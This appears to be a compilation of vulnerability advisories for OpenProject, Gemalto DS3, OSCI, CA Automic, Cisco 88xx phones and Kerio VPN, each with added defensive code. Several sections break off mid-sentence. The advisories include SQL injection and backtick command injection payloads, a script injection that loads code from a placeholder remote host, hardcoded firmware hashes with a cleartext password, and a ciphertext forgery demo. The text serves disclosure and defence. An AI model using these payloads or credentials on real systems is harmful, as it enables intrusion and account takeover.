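    "oracle":     re.compile(r"\bdbms_(?:lock\.sleep|pipe\.receive_message)\s*\(", re.I),
}
# Boolean scaffolding that injection tools wrap around a delay: ") AND n=(SELECT ..."
SCAFFOLD_RE = re.compile(r"\)\s*and\s+\d+\s*=\s*\(\s*select\b", re.I)


def classify_request(path):
    """Return the list of findings for one request path; empty when nothing looks like a probe."""
    decoded = unquote_plus(unquote_plus(path))      # decode twice: probes are often double-encoded
    findings = [engine for engine, rx in DELAY_PRIMITIVES.items() if rx.search(decoded)]
    if SCAFFOLD_RE.search(decoded):
        findings.append("boolean-scaffold")
    return findings


def scan_log(lines, slow_seconds=1.0):
    """Yield (path, findings, response_time) for suspicious lines.

    A matching path whose response also took at least slow_seconds is the strongest
    signal: the delay primitive actually executed on the database."""
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        findings = classify_request(m["path"])
        if not findings:
            continue
        rtime = float(m["time"]) if m["time"] else None
        if rtime is not None and rtime >= slow_seconds:
            findings.append("slow-response")
        yield m["path"], findings, rtime


# Constructed sample log (combined format with a trailing request-time field).
SAMPLE_LOG = [
    '10.0.0.5 - - [30/Apr/2019:10:12:01 +0000] "GET /api/v3/activities/1)%20AND%203281%3d(SELECT%203281%20FROM%20PG_SLEEP(1))%20AND%20(%3d HTTP/1.1" 500 0 1.043',
    '10.0.0.5 - - [30/Apr/2019:10:12:03 +0000] "GET /api/v3/activities/1 HTTP/1.1" 200 845 0.021',
    '10.0.0.9 - - [30/Apr/2019:10:13:44 +0000] "GET /api/v3/work_packages?filters=%5B%5D HTTP/1.1" 200 1203 0.088',
    '10.0.0.7 - - [30/Apr/2019:10:14:10 +0000] "GET /api/v3/activities/1%2529%2520and%25201%253d%2528select%25201%2520from%2520pg_sleep%25285%2529%2529 HTTP/1.1" 500 0 5.012',
    '10.0.0.3 - - [30/Apr/2019:10:15:00 +0000] "GET /search?q=how%20to%20sleep%20better HTTP/1.1" 200 5120 0.030',
]

if __name__ == "__main__":
    for path, findings, rtime in scan_log(SAMPLE_LOG):
        print("%-6s %-45s %s" % (rtime, ",".join(findings), path[:70]))
```

Two of the five constructed lines are reported, both with the PostgreSQL primitive, the scaffold and a slow response; the plain request and the search for "sleep better" are not, because the primitive is matched as a function call, not as a word.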
Vendor contact timeline:
---
2019-04-30: Contacting vendor through secur...@openproject.com
2019-04-30: A patch is published in version 8.3.2
2019-05-06: Vendor publishes further details
2019-05-10: Release of security advisory

Solution:
---
The vendor provides a patched version 8.3.2 and a security notice with further information:
https://www.openproject.org/release-notes/openproject-8-3-2
https://groups.google.com/forum/#!msg/openproject-security/XlucAJMxmzM/hESpOaFVAwAJ

Workaround:
---
None

Advisory URL:
---
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendations about the risk profile of new technologies.

~~~
Interested to work with the experts of SEC Consult? Send us your application
https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices
https://www.sec-consult.com/en/contact/index.html
~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Thanaphon Soo / @2019
SEC Consult SA-20190509-0 :: Multiple Vulnerabilities in Gemalto (Thales Group) DS3 Authentication Server / Ezio Server
SEC Consult Vulnerability Lab Security Advisory < 20190509-0 >
===
title: Multiple Vulnerabilities
product: Gemalto (Thales Group) DS3 Authentication Server / Ezio Server
vulnerable version: Ezio DS3 server
homepage: https://www.gemalto.com
found: 2019-02-11
by: TING Meng Yean (Office Singapore)
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult
    Europe | Asia | North America
    https://www.sec-consult.com
===

Vendor description:
---
DS3 Authentication Server is an appliance that provides authentication and end-to-end encryption for online banking and remote transactions. DS3 has been acquired by Gemalto, and the Authentication Server is now known as the Gemalto Ezio Server. Gemalto is now part of the Thales Group.

Source: http://www.fisid.ch/products/ds3-main-products.html
Source: https://www.gemalto.com/financial/ebanking/ezio-server
Source: https://www.thalesgroup.com/en/group/journalist/press-release/thales-completes-acquisition-gemalto-become-global-leader-digital

Business recommendation:
---
The vendor provides a patch, and users of this product are urged to upgrade to the latest version available. An in-depth security analysis performed by security professionals is highly advised, as the software may be affected by further security issues.

Vulnerability overview/description:
---
The DS3 Authentication Server is prone to several security issues, described below, which in combination allow a low-privileged application user to upload a JSP web shell running with the access rights of the low-privileged Linux system user "asadmin". The CVSSv3 scores have been provided by the vendor.

1) Semi-Blind OS Command Injection (Post-authenticated)
   - CVE-2019-9156
   - CWE-78
   - CVSSv3: 6.8 (Medium)
     https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

The DS3 Authentication Server provides several administration tools to perform connectivity checks. "TestTelnetConnection.jsp" does not correctly validate the user input for the "HOST_NAME" and "PORT_NUMBER" parameters, allowing an attacker to execute arbitrary commands on the server with the privileges of the local system user "asadmin".

2) Limited Local File Disclosure (LFD) (Post-authenticated)
   - CVE-2019-9157
   - CWE-538
   - CVSSv3: 5.7 (Medium)
     https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

The DS3 Authentication Server provides several administration tools to check the system's access and error logs. "TailLogs.jsp" does not correctly validate the user input for the "LOG_TYPE" parameter, allowing an attacker to read arbitrary local files with the privileges of the local system user "asadmin".

3) Broken Access Control (Post-authenticated)
   - CVE-2019-9158
   - CWE-284
   - CVSSv3: 5.7 (Medium)
     https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

The DS3 Authentication Server provides several permission groups granting different levels of privileges, from the administrative "dsssAdmin" group down to the low-privileged "READ_ONLY" group. A user in the "dsssAdmin" group sees more functions in the menu of the web portal than a user in the "READ_ONLY" group. However, a "READ_ONLY" user can still invoke some "dsssAdmin" functions by replaying the corresponding POST or GET request directly.

Proof of concept:
---
1) Semi-Blind OS Command Injection (Post-authenticated) (CVE-2019-9156)
This PoC was performed with a user in the "READ_ONLY" group. The exploit has two restrictions:
1) The injected shell commands cannot contain a space character (' '/%20).
2) The output of the injected commands must be empty or must not contain a space character (' '/%20).
The tester was nevertheless able to build complex shell command payloads without any space by using a bash trick.

The simple OS command payload "whoami" is injected into the "HOST_NAME" parameter, and the HTTP response contains the result of the payload ("asadmin") mixed into the page. Note that the OS command payload is enclosed in backtick (``) characters.

POST /ServerAdmin/TestTelnetConnection.jsp HTTP/1.1
Host: $IP
Cookie: JSESSIONID=
Content-Type: application/x-www-form-urlencoded
Content-Length: 132

CSRFTOKEN=[...]&HOST_NAME=127.0.0.1`whoami`&PORT_NUMBER=8443&RESULTS=%0D%0A%09%09%09%09%09%09

HTTP/1.1 200 OK
Str
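The bug class behind item 1 and the two halves of a fix, as an added example for this page (Python; it is not the product's JSP code). `shell_command_vulnerable` splices the raw HOST_NAME and PORT_NUMBER values into a string that a shell will parse, which is what lets backticks through. `validate_target` accepts only an IP literal or an RFC 1123 hostname and a numeric port in range, and `argv_hardened` passes the validated values as separate arguments with no shell involved, so metacharacters would stay literal even if validation were skipped. The advisory does not say which trick the tester used for space-free payloads; `${IFS}` is one well-known way, and the demo uses it only to show that it is caught by the same validation. `echo` stands in for the real telnet client so the demo runs anywhere.

```python
"""Connectivity-check endpoint: shell-string interpolation vs validated argv.

Added example, not the DS3/Ezio JSP code. "echo" stands in for a telnet client
so the demo runs offline.
"""
import ipaddress
import re
import subprocess

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens, no label
# starting or ending with a hyphen, at most 63 chars per label and 253 in total.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\.?$")


def shell_command_vulnerable(host, port):
    """The injection pattern: user input is spliced into a string a shell will parse.
    Backticks, $(...) and ; all survive, and ${IFS} substitutes for a space if spaces are blocked."""
    return "echo %s %s" % (host, port)


def validate_target(host, port):
    """Return (host, port) normalised, or raise ValueError. Allows an IPv4/IPv6 literal or a hostname."""
    try:
        host = str(ipaddress.ip_address(host))
    except ValueError:
        if not HOSTNAME_RE.match(host):
            raise ValueError("invalid host: %r" % host)
    if not re.fullmatch(r"\d{1,5}", str(port)) or not 1 <= int(port) <= 65535:
        raise ValueError("invalid port: %r" % port)
    return host, int(port)


def argv_hardened(host, port):
    """Validated values passed as separate arguments; no shell ever sees them."""
    host, port = validate_target(host, port)
    return ["echo", host, str(port)]


def is_valid_target(host, port):
    try:
        validate_target(host, port)
        return True
    except ValueError:
        return False


def run(argv_or_string, use_shell):
    """Execute and return stdout; used by the demo below only."""
    return subprocess.run(argv_or_string, shell=use_shell, capture_output=True,
                          text=True, check=False).stdout


if __name__ == "__main__":
    payload = "127.0.0.1`id`"                          # the advisory's shape: backticks, no spaces
    payload_ifs = "127.0.0.1`cat${IFS}/etc/hostname`"  # ${IFS} in place of a blocked space
    for h in (payload, payload_ifs):
        print("shell string  :", repr(run(shell_command_vulnerable(h, 8443), True).strip()))
        print("argv, no shell:", repr(run(["echo", h, "8443"], False).strip()))   # backticks stay literal
        print("validated     :", is_valid_target(h, 8443))
    print("validated     :", is_valid_target("gw.example.net", 8443), argv_hardened("gw.example.net", 8443))
```

Blocking the space character, which is what the two PoC restrictions amount to, is not a fix: validation has to be positive (what a host and a port may look like), and the command must be built without a shell.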
SEC Consult SA-20190205-0 :: Multiple vulnerabilities in OSCI-Transport Library 1.2 for German e-Government
A blog post with further information has been released on this topic as well:
https://r.sec-consult.com/osci

SEC Consult Vulnerability Lab Security Advisory < 20190205-0 >
===
title: Multiple vulnerabilities
product: OSCI-Transport Library 1.2 for German e-Government
vulnerable version: <=1.8.1
fixed version: 1.8.3
CVE number: -
impact: low - critical (highly dependent on the usage scenario)
homepage: http://www.xoev.de
found: 2018-09
by: W. Ettlinger (Office Vienna)
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult
    Europe | Asia | North America
    https://www.sec-consult.com
===

Vendor description:
---
(translated from German) "The specification of the OSCI-Transport protocol in version 1.2 describes a secure, vendor-independent and interoperable data exchange format. To ease implementation for users in public administration as well as for vendors of specialised applications (Fachverfahren), the OSCI 1.2 library is offered: the library implements OSCI-Transport version 1.2 and is thus independent of the subject-matter content. It is part of the OSCI-Transport infrastructure. The OSCI-Transport library is intended to be integrated into specialised applications (on the administration side) or client systems (on the customer side)."

Source: https://www.xoev.de/die_standards/osci_transport/osci_transport_1_2/osci_1_2_bibliothek-2310

Business recommendation:
---
The OSCI 1.2 Transport Library is intended to provide a secure message exchange channel over an untrusted network (i.e. the Internet) for German government agencies. In 2017 SEC Consult found several critical security vulnerabilities in the OSCI 1.2 Transport library version 1.6.1. These vulnerabilities were addressed in version 1.7.1. Further details on these vulnerabilities can be found here:
https://www.sec-consult.com/en/blog/2017/06/german-e-government-details-vulnerabilities/

In 2018 SEC Consult again identified vulnerabilities in this library. An attacker could use them to forge signatures of request-and-response-signed messages and to decrypt request-and-response-encrypted messages. Whether there is an impact on content signatures and content encryption was not fully examined.

As the newly identified vulnerabilities are similar to those identified in 2017, and due to the high complexity of this library, SEC Consult suspects further vulnerabilities that have not yet been discovered. Therefore, SEC Consult strongly recommends KoSIT and its partners to conduct a full security audit of the software component.

Vulnerability overview/description:
---
1) Insecure Cryptographic Algorithm
KoSIT is in the process of replacing legacy encryption algorithms with AES-GCM. Currently, the OSCI 1.2 Transport library still supports the following legacy encryption algorithms:
* http://www.w3.org/2001/04/xmlenc#tripledes-cbc
* http://www.w3.org/2001/04/xmlenc#aes128-cbc
* http://www.w3.org/2001/04/xmlenc#aes192-cbc
* http://www.w3.org/2001/04/xmlenc#aes256-cbc

None of these algorithms is recommended by the W3C any more:
"Note: Use of AES GCM is strongly recommended over any CBC block encryption algorithms as recent advances in cryptanalysis [...] have cast doubt on the ability of CBC block encryption algorithms to protect plain text when used with XML Encryption" (https://www.w3.org/TR/xmlenc-core1/)

Although these algorithms have been marked as deprecated, AES256-CBC is still used by default (see Constants.DEFAULT_SYMMETRIC_CIPHER_ALGORITHM).

The padding oracle attack that SEC Consult demonstrated previously was found to be no longer trivially exploitable. However, another approach was found that allows an attacker to bypass the transport encryption. It abuses the fact that the server leaks whether a decrypted string contains a colon (more specifically, whether it is a valid MIME header of the form name: value). By sending multiple requests and observing whether the decrypted string contains a colon, an attacker can narrow down the possible values of a single plaintext byte; once only one candidate remains, that byte is known. Repeating this for every position decrypts the whole ciphertext.

2) Signature Bypass
SEC Consult previously demonstrated an XML Signature Wrapping attack. While that exact attack is no longer possible, a similar one was identified. XML signatures are constructed as follows:
* an element "SignedInfo" contains multiple "Reference" elements, each referring to a signed element. The contents
SEC Consult SA-20190124-0 :: Cross-site scripting in CA Automic Workload Automation Web Interface (AWI)
SEC Consult Vulnerability Lab Security Advisory < 20190124-0 >
===
title: Cross-site scripting
product: CA Automic Workload Automation Web Interface (AWI) (formerly Automic Automation Engine, UC4)
vulnerable version: 12.0, 12.1, 12.2
fixed version: 12.0.6 HF2, 12.1.3 HF3, 12.2.1 HF1
CVE number: CVE-2019-6504
impact: medium
homepage: https://www.ca.com
found: 2018-10-15
by: Marc Nimmerrichter (Office Vienna)
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult
    Europe | Asia | North America
    https://www.sec-consult.com
===

Vendor description:
---
"The modern enterprise needs to orchestrate a complex, diverse landscape of applications, platforms and technologies. Workload automation can prove a critical differentiator, but only if it provides intelligent automation driven by data analytics. [...] CA Automic Workload Automation gives you the agility, speed, visibility and scalability needed to respond to the constantly changing technology landscape. It centrally manages and automates the execution of business processes end-to-end; across mainframe, cloud and hybrid environments in a way that never stops—even when doing an upgrade to the next version."

Source: https://www.ca.com/us/products/workload-automation-solution.html

Business recommendation:
---
Be aware that restrictions on privileges can be bypassed and that attackers may be able to take over other users' accounts. SEC Consult recommends to apply the vendor patch as soon as possible.

Vulnerability overview/description:
---
The Automation Engine Web Interface (AWI) is susceptible to a persistent cross-site scripting (XSS) attack. The vulnerability originates in an outdated version of the Vaadin framework (7.7.9), on which the UI implementation relies heavily. This version of Vaadin is affected by an XSS vulnerability in tooltips [1]. If attackers can control the content of tooltips created by the framework, they can execute arbitrary JavaScript code in the context of the user viewing the tooltip. AWI uses tooltips for various data fields, e.g. for the title of created objects. Thus, a user with the privilege to create or edit objects can inject JavaScript code that is executed for other users as soon as they move their cursor over the text carrying the tooltip.

[1] https://github.com/vaadin/framework/issues/8731

Proof of concept:
---
The vulnerability can be reproduced by creating or editing any object in AWI and using an ordinary JavaScript payload, e.g. one with an onerror handler. Because AWI only shows a tooltip when the text is longer than the column width, the text has to be padded with some sample text to make sure the JavaScript code gets executed.

Vulnerable / tested versions:
---
The tested version of AWI was 12.2.0.

Vendor contact timeline:
---
2018-10-18: SEC Consult contacts vendor through v...@ca.com via encrypted email.
2018-10-25: Vendor confirms the receipt of the vulnerability information.
2018-11-22: Vendor confirms the vulnerability and asks for postponement of the advisory release date.
2018-12-11: Vendor provides planned patch numbers.
2019-01-17: Vendor informs SEC Consult that patches have been published.
2019-01-18: CA Technologies and SEC Consult define January 24th 2019 as release date for the SEC Consult advisory and the CA Technologies Security Notice.
2019-01-24: Public release of security advisory

Solution:
---
The vendor provides patched versions:
Automic.Web.Interface 12.0.6 HF2
Automic.Web.Interface 12.1.3 HF3
Automic.Web.Interface 12.2.1 HF1

Available from: https://downloads.automic.com/

The vendor released a security advisory, which is available here:
https://support.ca.com/us/product-content/recommended-reading/security-notices/CA20190124-01-security-notice-for-ca-automic-workload-automation.html

Workaround:
---
None

Advisory URL:
---
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
SEC Consult SA-20190109-0 :: Multiple Vulnerabilities in Cisco VoIP Phones (88xx series)
SEC Consult Vulnerability Lab Security Advisory < 20190109-0 >
===
title: Multiple Vulnerabilities
product: Cisco VoIP Phones, e.g. models 88XX
vulnerable version: See list of vulnerable devices/firmwares below
fixed version: 12.5.1 MN
CVE number: CVE-2018-0461
impact: high
homepage: https://www.cisco.com
found: 10/2018
by: W. Schober, IoT Inspector (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"The Cisco IP Phone 8800 Series is a great fit for businesses of all sizes seeking secure, high-quality, full-featured VoIP. Select models provide affordable entry to HD video and support for highly-active, in-campus mobile workers."

Source: https://www.cisco.com/c/en/us/products/collaboration-endpoints/unified-ip-phone-8800-series/index.html

Business recommendation:
SEC Consult recommends updating the devices to the newest firmware (12.5.1 MN), where all the documented issues are fixed according to the vendor. We want to thank Cisco for the very professional response and great coordination.

Vulnerability overview/description:
---
1) Arbitrary Script Injection
The VoIP phones can be managed directly via the integrated keyboard and the built-in screen. In the configuration menu a few spots allow users to input text via the integrated keyboard into text boxes (e.g. Hostname). Those text input fields are prone to JavaScript-like code injection. An attacker is able to inject arbitrary payloads via the T9 keyboard.

2) Hard coded and weak secrets (Identified during an automated firmware analysis by IoT Inspector)
The firmware, which is directly served from Cisco, contains multiple hard coded password hashes. They are stored in the /etc/passwd file and are hashed using an outdated algorithm (UNIX MD5+salt). The users are not documented anywhere. Access via SSH using those credentials is possible. Due to the outdated algorithm in use (UNIX MD5+salt) and the very weak password it was easily possible to brute-force the password within seconds.

3) Undocumented debug functionality
During a manual firmware analysis a few undocumented endpoints in the built-in web application, which is running on the VoIP phone, were identified. Those routes lead to parts of the web application that are neither documented nor officially mentioned anywhere by Cisco. Those parts of the web application allow an attacker to debug the device and create memory dumps.

4) Various outdated components with known vulnerabilities
During the check a lot of outdated components were identified by their version numbers. It is not known which patches got backported by the vendor, but Cisco mentioned that they have implemented some. The potentially affected components are:
-) wpa_supplicant
-) BusyBox
-) Dnsmasq
-) OpenSSL
-) OpenSSH
-) Linux Kernel Privilege Escalation "pp_key"
-) Linux Kernel Privilege Escalation "Mempodipper"
-) Multiple Linux Kernel CVE entries

Please take a look at the IoT Inspector report for details:
https://r.sec-consult.com/iotinspectorcisco

Proof of concept:
-
1) Arbitrary Script Injection
A lot of settings can be changed directly on the VoIP phone via the built-in screen. There are also multiple locations where user input is parsed and displayed. It was possible to inject arbitrary (JavaScript) code directly into the phone UI. As an example, the hostname of the VoIP phone can be changed to the following value:

hostname">http://$IP/sec.js onload=exec()>

The sec.js gets loaded from the remote host immediately and the exec function is executed.

< A screenshot can be found online on our website >

Further analysis has not been performed, but depending on the underlying libraries/system in use, it might be possible to get system level access via this attack vector.

2) Hard coded and weak secrets
The file at the following path contains a hard coded password for the user debug:
/_rootfs288xx.12-0-1ES-15.sbn.extracted/squashfs-root/etc/passwd

$1$aoJQnypw$vHpN9WTJEQn1UnHzJdoz71 (Type: MD5 (Unix))

This hash corresponds to the following clear-text password: debug

The password for the users root and default is also stored in /etc/passwd:
nCjlgBm7.lvX2 (Type: DES (Unix)) - Users: root, default

3) Undocumented debug functionality
The built-in VoIP phone web server offers multiple functionalities for the end user. During a manual analysis, undocumented endpoints with critical functionality got identified. The functionality can be found by visiting the following endpoint:
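The /etc/passwd findings under 2) above are the kind of thing a firmware audit should catch automatically: hashes living in the world-readable passwd file instead of shadow, hash types that crack in seconds (traditional DES, md5crypt), and one hash shared by several accounts. The following checker is an added example, not Cisco's or IoT Inspector's code. Only the user names and the two hashes in the sample come from the advisory; the uid/gid/home/shell fields and the daemon/nobody entries are constructed.

```python
"""Audit an /etc/passwd taken from a firmware image for weak or misplaced password hashes.

Added example; only the user names and hashes in SAMPLE_PASSWD come from the advisory,
the remaining fields of each line are constructed for the demo.
"""
import re
from collections import defaultdict

TRADITIONAL_DES = re.compile(r"^[./0-9A-Za-z]{13}$")   # 13-char crypt(3) DES hash
PREFIX_ALGOS = {
    "$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt", "$6$": "sha512crypt", "$7$": "scrypt", "$y$": "yescrypt",
}
WEAK = {"des", "md5crypt"}          # fast, unsalted-or-short-salt schemes
LOCKED = {"", "*", "!", "!!", "x"}  # no usable hash, or the hash lives in /etc/shadow


def hash_algorithm(field: str):
    """Name the hash scheme of a passwd/shadow password field, None if there is none."""
    if field in LOCKED:
        return None
    for prefix, algo in PREFIX_ALGOS.items():
        if field.startswith(prefix):
            return algo
    if TRADITIONAL_DES.match(field):
        return "des"
    return "unknown"


def parse_passwd(text: str):
    """Return (user, password_field) pairs for each well-formed 7-field line."""
    rows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        rows.append((fields[0], fields[1]))
    return rows


def audit_passwd(text: str):
    """Return (user, finding) tuples for hashes in passwd, weak schemes and shared hashes."""
    findings = []
    users_by_hash = defaultdict(list)
    for user, field in parse_passwd(text):
        algo = hash_algorithm(field)
        if algo is None:
            continue
        findings.append((user, "hash stored in world-readable /etc/passwd"))
        if algo in WEAK:
            findings.append((user, "weak hash algorithm: " + algo))
        users_by_hash[field].append(user)
    for users in users_by_hash.values():
        if len(users) > 1:
            findings.append((",".join(users), "same password hash shared by several accounts"))
    return findings


# Constructed sample: the root/default and debug hashes are the ones quoted in the
# advisory; uid/gid/home/shell and the last two accounts are made up for the demo.
SAMPLE_PASSWD = """\
root:nCjlgBm7.lvX2:0:0:root:/:/bin/sh
default:nCjlgBm7.lvX2:1000:1000::/tmp:/bin/sh
debug:$1$aoJQnypw$vHpN9WTJEQn1UnHzJdoz71:1001:1001::/tmp:/bin/sh
daemon:*:2:2:daemon:/sbin:/sbin/nologin
nobody:x:99:99:nobody:/:/sbin/nologin
"""

if __name__ == "__main__":
    for user, finding in audit_passwd(SAMPLE_PASSWD):
        print(f"{user}: {finding}")
```

Run it against the passwd file of an unpacked firmware (binwalk output, squashfs-root/etc/passwd) rather than the sample; any account the checker flags is a candidate for the quick dictionary run the advisory describes, and a shared hash means one cracked password opens every account that uses it.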
SEC Consult SA-20181205-0 :: Inadequate cryptography implementation in Kerio Control VPN protocol
SEC Consult Vulnerability Lab Security Advisory < 20181205-0 >
===
title: Inadequate cryptography implementation
product: Kerio Control VPN protocol
vulnerable version: <=9.2.7
fixed version: 9.2.8
CVE number: -
impact: High
homepage: http://www.kerio.com/products/kerio-control
found: 2018-10
by: W. Ettlinger (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"Protect your network from viruses, malware and malicious activity with Kerio Control, the easy-to-administer yet powerful all-in-one security solution. Kerio Control brings together next-generation firewall capabilities -- including a network firewall and router, intrusion detection and prevention (IPS), gateway anti-virus, VPN, and web content and application filtering. These comprehensive capabilities and unmatched deployment flexibility make Kerio Control the ideal choice for small and mid-sized businesses."

"Link headquarters to remote users and branch offices securely and easily. Kerio’s own VPN tunneling with dead-simple setup requires minimal configuration, and provides a high performance network connection. Or, use industry-standard IPsec/L2TP for connectivity from mobile devices or third-party firewalls. Enable 2-step verification for an extra layer of security on all forms of remote access."

Source: http://www.kerio.com/products/kerio-control

Business recommendation:
During a quick evaluation of the Kerio Control VPN protocol it was apparent that the cryptographic protocol employed exhibits severe design issues. Generally, SEC Consult strongly recommends preferring well-established standard cryptographic protocols (e.g. DTLS, IPsec) over proprietary protocols wherever possible. Due to their widespread use, they generally receive much greater attention from experts, so many design issues in these protocols have already been detected and mitigated. We therefore recommend businesses to switch from Kerio's proprietary VPN protocol to a standard protocol (Kerio Control e.g. supports IPsec).

Note that no full audit of Kerio Control, Kerio VPN or the cryptographic protocol has been conducted. In addition to the vulnerabilities described here, we already identified critical vulnerabilities in Kerio Control in 2016. Hence we suspect there are more major security deficiencies in the product. We therefore recommend GFI Software to greatly increase the efforts towards product security in order to keep customers secure.

We want to explicitly thank GFI for the professional handling of the communication during this whole process.

Vulnerability overview/description:
---
After a TLS connection is established between the Kerio VPN client and the Kerio Control appliance and cryptographic keys have been securely transferred over this connection, the data sent through the VPN is transmitted in UDP packets. Each of these packets is encrypted using Blowfish in CTR mode. As this mode does not provide data authenticity, encrypted data that is modified by an attacker results in a predictable modification of the plaintext. More precisely, bits that are flipped in the ciphertext result in the same bits being flipped in the plaintext after decryption.

Each encrypted UDP datagram contains a simple checksum (the same checksum used by IPv4). Assuming an attacker knows the plaintext data of a datagram and is able to modify its ciphertext, it is trivial to change parts of the message, e.g. inject content into the encrypted stream, while keeping the resulting checksum identical.

Proof of concept:
-
SEC Consult provided a proof of concept exploit script to GFI but it has been removed from this advisory in order to give customers more time to upgrade their infrastructure.

Vulnerable / tested versions:
-
The version 9.2.7 build 2921 was found to be vulnerable. This version was the latest at the time of discovery and older versions are affected as well.

Vendor contact timeline:
2018-10-17: Creating support case at https://gfisoftware.force.com, asking for security contact
2018-10-17: GFI support: Asking to upload advisory to support portal
2018-10-19: Uploading advisory
2018-10-22: GFI support: Escalated to engineers to further investigate
2018-10-25: GFI support acknowledges vulnerability
2018-11-08: GFI support: Beta version with patch available (with AES 128)
2018-11-09: Asking for release date of the patch
2018-11-12: GF
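The malleability described in the Kerio advisory above does not depend on Blowfish: any CTR or stream cipher turns a ciphertext bit flip into the same plaintext bit flip, and a ones'-complement checksum inside the encrypted datagram is no obstacle once the attacker knows the plaintext, because the checksum bits can be flipped along with the payload. The code below is an added illustration, not the removed SEC Consult exploit or Kerio's code. It stands in HMAC-SHA256 counter output for the Blowfish-CTR keystream (same XOR structure, no third-party library needed) and assumes a datagram layout of a 2-byte IPv4-style checksum followed by the payload, both under the encryption; the keys, nonce and the "known" request are constructed. The second half shows the fix that makes the same bit flips fail: authenticate the ciphertext (encrypt-then-MAC, or an AEAD) and reject before decrypting.

```python
"""Bit-flipping an unauthenticated CTR datagram while keeping its IPv4-style checksum valid.

Added example, not Kerio's code. HMAC-SHA256 counter output stands in for the
Blowfish-CTR keystream; the datagram layout (2-byte checksum || payload, both
encrypted) is an assumption for this demo.
"""
import hashlib
import hmac
import struct


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Counter-mode keystream: HMAC-SHA256(key, nonce || counter) blocks, truncated."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + struct.pack(">Q", counter), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def xor_stream(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """CTR encryption and decryption are the same XOR with the keystream."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, nonce, len(data))))


def ip_checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement sum of 16-bit words, as used by IPv4 headers."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(">%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_plaintext(payload: bytes) -> bytes:
    """Assumed datagram body: checksum(payload) || payload."""
    return struct.pack(">H", ip_checksum(payload)) + payload


def checksum_ok(plaintext: bytes) -> bool:
    """What the receiver checks after decryption."""
    (stored,) = struct.unpack(">H", plaintext[:2])
    return stored == ip_checksum(plaintext[2:])


def tamper(ciphertext: bytes, known_plaintext: bytes, new_payload: bytes) -> bytes:
    """Attacker step: XOR the ciphertext with (known || desired) so that decryption
    yields the desired datagram, recomputed checksum included."""
    desired = build_plaintext(new_payload)
    if len(desired) != len(known_plaintext):
        raise ValueError("replacement payload must keep the datagram length")
    delta = bytes(a ^ b for a, b in zip(known_plaintext, desired))
    return bytes(c ^ d for c, d in zip(ciphertext, delta))


# --- the fix: authenticate the ciphertext (encrypt-then-MAC) -------------------
TAG_LEN = 32


def seal(enc_key: bytes, mac_key: bytes, nonce: bytes, plaintext: bytes) -> bytes:
    ct = xor_stream(enc_key, nonce, plaintext)
    return ct + hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()


def open_sealed(enc_key: bytes, mac_key: bytes, nonce: bytes, blob: bytes):
    ct, tag = blob[:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None                      # reject without touching the plaintext
    return xor_stream(enc_key, nonce, ct)


def demo() -> dict:
    enc_key, mac_key, nonce = b"K" * 32, b"M" * 32, b"\x00" * 8   # constructed keys
    known = b"GET /status HTTP/1.0"    # plaintext the attacker can predict
    forged = b"GET /admin  HTTP/1.0"   # same length, different request
    pt = build_plaintext(known)

    # Unauthenticated CTR: the forged datagram decrypts cleanly and passes the checksum.
    ct = xor_stream(enc_key, nonce, pt)
    forged_pt = xor_stream(enc_key, nonce, tamper(ct, pt, forged))

    # Encrypt-then-MAC: the identical bit flips are detected before decryption.
    sealed = seal(enc_key, mac_key, nonce, pt)
    attacked = tamper(sealed[:-TAG_LEN], pt, forged) + sealed[-TAG_LEN:]

    return {
        "original_ok": checksum_ok(xor_stream(enc_key, nonce, ct)),
        "tampered_ok": checksum_ok(forged_pt),
        "tampered_payload": forged_pt[2:],
        "authenticated_rejected": open_sealed(enc_key, mac_key, nonce, attacked) is None,
    }


if __name__ == "__main__":
    print(demo())
```

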